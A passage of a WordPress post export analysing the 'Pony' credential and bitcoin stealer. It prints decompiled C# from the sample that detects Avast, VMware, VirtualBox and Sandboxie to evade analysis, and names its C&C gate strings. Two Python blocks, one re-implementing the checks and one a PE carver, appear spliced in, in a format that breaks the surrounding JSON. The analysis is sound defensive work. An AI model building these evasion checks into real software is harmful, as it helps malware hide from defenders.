The bitmap image is read from the resources directory, converted to a byte array, and the stream is then decompressed, then decrypted.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p9.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p9-300x208.png\" alt=\"p9\" width=\"300\" height=\"208\" class=\"alignnone size-medium wp-image-1170\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p9-300x208.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p9-1024x711.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p9.png 1067w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>While we *could* copy and paste this into a project of our own to decrypt the mystery bitmap image, it&#8217;s much easier to extract after the process hollowing operation is performed. <\/p>\n<p>Other interesting tidbits include code that checks for the presence of Avast anti-virus:<br \/>\n<\/p>\n<div style=\"background: #000000; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\"><span style=\"color: #cdcd00\">public<\/span> <span style=\"color: #cdcd00\">static<\/span> <span style=\"color: #cdcd00\">void<\/span> <span style=\"color: #cccccc\">avast()<\/span>\r\n<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cdcd00\">try<\/span>\r\n\t<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">IntPtr<\/span> <span style=\"color: #cccccc\">moduleHandle<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">flfvdNHm.GetModuleHandle(<\/span><span style=\"color: #cd0000\">&quot;snxhk.dll&quot;<\/span><span style=\"color: #cccccc\">);<\/span>\r\n\t<span style=\"color: #cdcd00\">while<\/span> <span style=\"color: 
#cccccc\">(moduleHandle<\/span> <span style=\"color: #cccccc\">!=<\/span> <span style=\"color: #cccccc\">IntPtr.Zero)<\/span>\r\n     <span style=\"color: #cccccc\">{<\/span>\r\n       <span style=\"color: #cccccc\">moduleHandle<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">flfvdNHm.GetModuleHandle(<\/span><span style=\"color: #cd0000\">&quot;snxhk.dll&quot;<\/span><span style=\"color: #cccccc\">);<\/span>\r\n\t   <span style=\"color: #cccccc\">Thread.Sleep(<\/span><span style=\"color: #cd00cd\">1000<\/span><span style=\"color: #cccccc\">);<\/span>\r\n     <span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cdcd00\">catch<\/span>\r\n\t<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">}<\/span>\r\n<span style=\"color: #cccccc\">}<\/span>\r\n<\/pre>\n<\/div>\n<p>And then there&#8217;s these two methods which handle Virtual Machine and Sandboxie detection:<br \/>\n<!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #000000; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\"><span style=\"color: #cdcd00\">private<\/span> <span style=\"color: #cdcd00\">static<\/span> <span style=\"color: #00cd00\">bool<\/span> <span style=\"color: #cccccc\">VMRunning()<\/span>\r\n<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">List&lt;<\/span><span style=\"color: #00cd00\">string<\/span><span style=\"color: #cccccc\">&gt;<\/span> <span style=\"color: #cccccc\">list<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">List&lt;<\/span><span style=\"color: #00cd00\">string<\/span><span style=\"color: #cccccc\">&gt;();<\/span>\r\n\t<span style=\"color: #cdcd00\">using<\/span> <span style=\"color: 
#cccccc\">(ManagementObjectCollection.ManagementObjectEnumerator<\/span> <span style=\"color: #cccccc\">enumerator<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">ManagementObjectSearcher(<\/span><span style=\"color: #cd0000\">&quot;SELECT Description FROM Win32_VideoController&quot;<\/span><span style=\"color: #cccccc\">).Get().GetEnumerator())<\/span>\r\n<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cdcd00\">while<\/span> <span style=\"color: #cccccc\">(enumerator.MoveNext())<\/span>\r\n\t<span style=\"color: #cccccc\">{<\/span>\r\n\t\t<span style=\"color: #cccccc\">ManagementObject<\/span> <span style=\"color: #cccccc\">managementObject<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">(ManagementObject)enumerator.Current;<\/span>\r\n\t\t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(managementObject[<\/span><span style=\"color: #cd0000\">&quot;Description&quot;<\/span><span style=\"color: #cccccc\">]<\/span> <span style=\"color: #cccccc\">!=<\/span> <span style=\"color: #cdcd00\">null<\/span><span style=\"color: #cccccc\">)<\/span>\r\n\t\t<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">list.Add(Convert.ToString(managementObject[<\/span><span style=\"color: #cd0000\">&quot;Description&quot;<\/span><span style=\"color: #cccccc\">]).Trim().ToLower());<\/span>\r\n\t\t<span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cccccc\">}<\/span>\r\n<span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cdcd00\">return<\/span> <span style=\"color: #cccccc\">list.Contains(<\/span><span style=\"color: #cd0000\">&quot;virtualbox graphics adapter&quot;<\/span><span style=\"color: #cccccc\">)<\/span> <span style=\"color: #cccccc\">||<\/span> <span style=\"color: #cccccc\">list.Contains(<\/span><span style=\"color: #cd0000\">&quot;vmware svga ii&quot;<\/span><span 
style=\"color: #cccccc\">)<\/span> <span style=\"color: #cccccc\">||<\/span> <span style=\"color: #cccccc\">list.Contains(<\/span><span style=\"color: #cd0000\">&quot;vm additions s3 trio32\/64&quot;<\/span><span style=\"color: #cccccc\">);<\/span>\r\n\t\t<span style=\"color: #cccccc\">}<\/span>\r\n\r\n<span style=\"color: #cdcd00\">private<\/span> <span style=\"color: #cdcd00\">static<\/span> <span style=\"color: #00cd00\">bool<\/span> <span style=\"color: #cccccc\">antiSandie()<\/span>\r\n<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">Process[]<\/span> <span style=\"color: #cccccc\">processes<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Process.GetProcesses();<\/span>\r\n\t<span style=\"color: #cdcd00\">for<\/span> <span style=\"color: #cccccc\">(<\/span><span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">i<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">;<\/span> <span style=\"color: #cccccc\">i<\/span> <span style=\"color: #cccccc\">&lt;<\/span> <span style=\"color: #cccccc\">processes.Length;<\/span> <span style=\"color: #cccccc\">i++)<\/span>\r\n\t<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">Process<\/span> <span style=\"color: #cccccc\">process<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">processes[i];<\/span>\r\n\t<span style=\"color: #00cd00\">string<\/span> <span style=\"color: #cccccc\">a<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">process.ProcessName.ToLower();<\/span>\r\n\t\t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(a<\/span> <span style=\"color: #cccccc\">==<\/span> <span style=\"color: #cd0000\">&quot;sandboxierpcss&quot;<\/span> <span style=\"color: #cccccc\">&amp;&amp;<\/span> <span style=\"color: #cccccc\">Process.GetCurrentProcess().SessionId<\/span> <span 
style=\"color: #cccccc\">==<\/span> <span style=\"color: #cccccc\">process.SessionId)<\/span>\r\n\t\t<span style=\"color: #cccccc\">{<\/span>\r\n\t\t<span style=\"color: #cccccc\">ProjectData.EndApp();<\/span>\r\n\t\t<span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cdcd00\">return<\/span> <span style=\"color: #cdcd00\">false<\/span><span style=\"color: #cccccc\">;<\/span>\r\n<span style=\"color: #cccccc\">}<\/span>\r\n<\/pre>\n<\/div>\n<p>This code doesn&#8217;t really work on my VMware instance though, making it worthless. Then again, who the hell checks for JUST Avast?<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1423877419611.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1423877419611.png\" alt=\"1423877419611\" width=\"438\" height=\"877\" class=\"alignnone size-full wp-image-1169\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1423877419611.png 438w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1423877419611-150x300.png 150w\" sizes=\"(max-width: 438px) 100vw, 438px\" \/><\/a><\/p>\n<p>So how do we get at this new file? Easily. Remember in the video how I killed &#8216;Regasm.exe&#8217;? That&#8217;s where the data is injected. A simple matter of dumping the exe while it&#8217;s running will reveal our final payload. 
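<\/p>
<p>To see exactly what the avast(), VMRunning() and antiSandie() methods above would and wouldn&#8217;t catch, here is a Python re-implementation of the three checks, added for this write-up (it is not the sample&#8217;s code, which is C#, and not the author&#8217;s tooling). The box profiles it runs over are constructed: the adapter strings VMware SVGA 3D and Microsoft Hyper-V Video, and the vendor tokens in the hypothetical vm_running_loose(), are assumptions about what typical guests report, not measurements from this analysis. The point it makes is that VMRunning() does an exact comparison against three fixed strings, so a VMware guest whose video controller describes itself as anything other than VMware SVGA II walks straight past it, which is one plausible reason the check was a no-op on the author&#8217;s VMware box.<\/p>

```python
# Added example for this write-up: a Python re-implementation of the sample's
# three evasion checks (the malware itself is C#). It runs them over constructed
# "analysis box" profiles so we can see what each check would actually match.
# The adapter strings and process names in the profiles are assumed typical
# values, not measurements from this analysis.

# The exact strings VMRunning() compares against after Trim().ToLower().
VM_ADAPTER_STRINGS = {
    "virtualbox graphics adapter",
    "vmware svga ii",
    "vm additions s3 trio32/64",
}
SANDBOXIE_RPC_PROCESS = "sandboxierpcss"  # process name antiSandie() looks for
AVAST_HOOK_DLL = "snxhk.dll"              # module avast() polls with GetModuleHandle


def vm_running(video_descriptions):
    """Mirror of VMRunning(): exact match on Win32_VideoController.Description
    after Trim().ToLower(), skipping null descriptions like the original."""
    seen = {d.strip().lower() for d in video_descriptions if d is not None}
    return bool(seen & VM_ADAPTER_STRINGS)


def vm_running_loose(video_descriptions):
    """Hypothetical sturdier variant (NOT in the sample): substring match on
    hypervisor vendor tokens, so a driver rename does not defeat the check."""
    tokens = ("vmware", "virtualbox", "vbox", "hyper-v", "qxl", "parallels")
    for desc in video_descriptions:
        if desc is not None and any(t in desc.strip().lower() for t in tokens):
            return True
    return False


def sandboxie_terminates(process_table, my_session_id):
    """Mirror of antiSandie(): the method itself always returns false; its real
    effect is ProjectData.EndApp() when SandboxieRpcSs runs in the caller's
    session. Returns True when the sample would terminate itself."""
    return any(
        name.lower() == SANDBOXIE_RPC_PROCESS and session == my_session_id
        for name, session in process_table
    )


def avast_stalls(loaded_modules):
    """Mirror of avast(): while snxhk.dll is mapped in the process the sample
    sleeps a second at a time in a loop and never exits on its own. Returns
    True when the sample would hang instead of detonating."""
    return AVAST_HOOK_DLL in {m.lower() for m in loaded_modules}


def evaluate(profile):
    """Run all three checks over one constructed box profile."""
    return {
        "vm_exact": vm_running(profile["video"]),
        "vm_loose": vm_running_loose(profile["video"]),
        "sandboxie_kill": sandboxie_terminates(profile["processes"], profile["session"]),
        "avast_stall": avast_stalls(profile["modules"]),
    }


def _box(video, processes=(("explorer", 1),), modules=("ntdll.dll",), session=1):
    return {"video": list(video), "processes": list(processes),
            "modules": list(modules), "session": session}


# Constructed profiles; the description strings are assumptions about typical guests.
PROFILES = {
    "virtualbox": _box(["VirtualBox Graphics Adapter"]),
    "vmware-legacy": _box(["VMware SVGA II"]),
    "vmware-3d": _box(["VMware SVGA 3D"]),          # newer VMware guests (assumed)
    "hyperv": _box(["Microsoft Hyper-V Video"]),     # assumed description
    "sandboxie": _box(["Intel(R) HD Graphics"],
                      processes=[("SandboxieRpcSs", 1), ("explorer", 1)]),
    "sandboxie-other-session": _box(["Intel(R) HD Graphics"],
                                    processes=[("SandboxieRpcSs", 0)]),
    "avast-host": _box(["Intel(R) HD Graphics"], modules=["ntdll.dll", "snxhk.dll"]),
}


def report():
    """Which checks each profile trips; the interesting row is vmware-3d."""
    return {name: evaluate(p) for name, p in PROFILES.items()}


if __name__ == "__main__":
    for name, result in report().items():
        tripped = [k for k, v in result.items() if v] or ["nothing"]
        print(f"{name:24s} trips: {', '.join(tripped)}")
```

<p>Running it prints which checks each profile trips. Of the three, only antiSandie() changes control flow on its own; avast() merely stalls, and VMRunning() returns a bool whose consumer isn&#8217;t shown in the decompiled excerpt.<\/p>
<p>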
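<\/p>
<p>If you would rather script the dump than click through a GUI tool, the carver below is an added example for this write-up (not the author&#8217;s tooling and not code from the sample). Given a blob of bytes, whether a region read out of the hollowed RegAsm.exe or the decrypted resource data, it finds every MZ\/PE header, validates the COFF and optional headers, works out how far the image extends (file layout by section raw sizes, or memory layout by SizeOfImage when the bytes came from a live process) and flags whether the image carries a CLR header, i.e. whether it is .NET or native. The blob it is demonstrated on is constructed by build_fake_pe() and is not data from the sample.<\/p>

```python
# Added example for this write-up, not the author's tooling and not code from
# the sample: a small PE carver for pulling the injected stage out of a byte
# blob (a region dumped from the hollowed RegAsm.exe, or the decrypted resource
# data). It finds every MZ/PE header, validates the headers, works out how far
# the image extends and reports whether it is managed (.NET) or native.
# The blob it runs on is constructed by build_fake_pe(); it is not sample data.
import struct

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
IMAGE_FILE_MACHINE_I386 = 0x14C
DIR_CLR_RUNTIME_HEADER = 14   # data directory slot that is non-zero for .NET images
SECTION_HEADER_SIZE = 40


def parse_pe(buf, off, memory_layout=False):
    """Validate the PE at buf[off:] and describe it, or return None if it is not one.
    memory_layout=True sizes the image by SizeOfImage (bytes read from a live
    process); otherwise by the furthest section raw data (file on disk / blob)."""
    if buf[off:off + 2] != b"MZ" or off + 0x40 > len(buf):
        return None
    e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
    nt = off + e_lfanew
    if not 0x40 <= e_lfanew <= 0x400 or nt + 24 > len(buf) or buf[nt:nt + 4] != b"PE\0\0":
        return None
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, nt + 4)
    opt = nt + 24
    if nsec == 0 or nsec > 96 or opt + opt_size + nsec * SECTION_HEADER_SIZE > len(buf):
        return None
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic == PE32_MAGIC:
        dirs = opt + 96        # data directories start after the PE32 fields
    elif magic == PE32PLUS_MAGIC:
        dirs = opt + 112       # PE32+ has an 8-byte ImageBase and wider size fields
    else:
        return None
    if dirs > len(buf):
        return None
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    size_of_image, size_of_headers = struct.unpack_from("<II", buf, opt + 56)
    num_dirs = struct.unpack_from("<I", buf, dirs - 4)[0]
    clr_rva = 0
    if num_dirs > DIR_CLR_RUNTIME_HEADER and dirs + (DIR_CLR_RUNTIME_HEADER + 1) * 8 <= len(buf):
        clr_rva = struct.unpack_from("<I", buf, dirs + DIR_CLR_RUNTIME_HEADER * 8)[0]
    sections, file_end = [], size_of_headers
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", buf, opt + opt_size + i * SECTION_HEADER_SIZE)
        sections.append(name.rstrip(b"\0").decode("ascii", "replace"))
        file_end = max(file_end, raw_ptr + raw_size)
    size = size_of_image if memory_layout else file_end
    return {
        "offset": off,
        "size": min(size, len(buf) - off),
        "truncated": off + size > len(buf),   # the dump ended before the image did
        "machine": machine,
        "bits": 64 if magic == PE32PLUS_MAGIC else 32,
        "entry_rva": entry,
        "sections": sections,
        "managed": clr_rva != 0,
    }


def carve_pe_images(buf, memory_layout=False):
    """Find every valid PE in buf. Skips past each image found so headers embedded
    inside it (resources, overlays) are not reported a second time."""
    found, pos = [], buf.find(b"MZ")
    while pos != -1:
        info = parse_pe(buf, pos, memory_layout)
        if info is None:
            pos = buf.find(b"MZ", pos + 1)
        else:
            found.append(info)
            pos = buf.find(b"MZ", pos + max(info["size"], 2))
    return found


def build_fake_pe(managed, body=b"\x90" * 64):
    """Construct a minimal, structurally valid PE32 with one .text section.
    Constructed test data for the demo, not bytes from the sample."""
    file_align, nt_off, opt_size, size_of_headers = 0x200, 0x80, 224, 0x200
    raw_size = -(-len(body) // file_align) * file_align
    dos = bytearray(nt_off)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, nt_off)
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)                    # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                  # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, file_align)       # Section/FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, size_of_headers)  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    if managed:                                                # CLR header => .NET image
        struct.pack_into("<II", opt, 96 + DIR_CLR_RUNTIME_HEADER * 8, 0x2008, 72)
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(body), 0x1000, raw_size,
                       size_of_headers, 0, 0, 0, 0, 0x60000020)
    header = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect).ljust(size_of_headers, b"\0")
    return header + body.ljust(raw_size, b"\0")


def build_demo_blob():
    """A constructed 'dump': padding, a managed image, junk with a stray MZ,
    then a native image (the shape we expect after process hollowing)."""
    return (b"\x00" * 0x100 + build_fake_pe(managed=True)
            + b"junk MZ junk" + build_fake_pe(managed=False, body=b"\xCC" * 100))


if __name__ == "__main__":
    for img in carve_pe_images(build_demo_blob()):
        kind = ".NET" if img["managed"] else "native"
        print(f"PE at 0x{img['offset']:x} size 0x{img['size']:x} {kind} PE{img['bits']} "
              f"sections={img['sections']} truncated={img['truncated']}")
```

<p>On a real dump from a hollowed process pass memory_layout=True: the image is laid out at its virtual addresses there, so section raw pointers are meaningless and SizeOfImage is the right extent. A native, unmanaged result is what you expect for the final stage here, which is consistent with it going into IDA rather than back into a .NET decompiler.<\/p>
<p>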
To save time again, here&#8217;s another video.<\/p>\n<p><iframe loading=\"lazy\" width=\"420\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/bymtblXZrrQ\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n<p>So what is this weird pony icon exe?<br \/>\nLoading the sample up with IDA and looking at the strings is a good start.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p11.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p11-300x169.png\" alt=\"p11\" width=\"300\" height=\"169\" class=\"alignnone size-medium wp-image-1173\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p11-300x169.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p11-1024x576.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p11.png 1920w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Googling around for the strings &#8216;moni\/panel\/Pony.exe&#8217; and &#8216;moni\/panel\/gate.php&#8217; proved fruitful. The malware is called &#8216;pony&#8217; (of course) so I wasn&#8217;t too far off in my assumptions. <a href=\"https:\/\/www.damballa.com\/pony-loader-2-0-steals-credentials-bitcoin-wallets-source-code-sale\/\" target=\"_blank\">According to this<\/a> the 3rd stage is a password stealer. <\/p>\n<p>Continuing to look at strings confirms this. 
Who knew there were so many kinds of bitcoins?<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p13.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p13-224x300.png\" alt=\"p13\" width=\"224\" height=\"300\" class=\"alignnone size-medium wp-image-1174\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p13-224x300.png 224w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p13.png 758w\" sizes=\"(max-width: 224px) 100vw, 224px\" \/><\/a><\/p>\n<p>And there you have it, all 3 stages of execution, the C&#038;C, the injection method, and the target (passwords &#038; bitcoins).<\/p>\n<p>Join me again soon when I cover the basics of reversing exploits in PDF and Word documents.<\/p>\n<p>Until then, happy hacking!<\/p>\n<p><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1209918058568.jpg\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1209918058568-547x1024.jpg\" alt=\"1209918058568\" width=\"547\" height=\"1024\" class=\"alignnone size-large wp-image-1175\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1209918058568-547x1024.jpg 547w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1209918058568-160x300.jpg 160w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1209918058568.jpg 749w\" sizes=\"(max-width: 547px) 100vw, 547px\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Howdy fellow readers. My time is split between video games, code, and work. I have a number of interesting samples I&#8217;ve seen that I&#8217;ve decided to share with you all. This is a 3+ stage malware. Each stage meaning its own executable (think inception, but with exes). This isn&#8217;t all that uncommon with malware. 
Typically [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,7],"tags":[48],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1156"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=1156"}],"version-history":[{"count":6,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1156\/revisions"}],"predecessor-version":[{"id":1177,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1156\/revisions\/1177"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=1156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=1156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=1156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}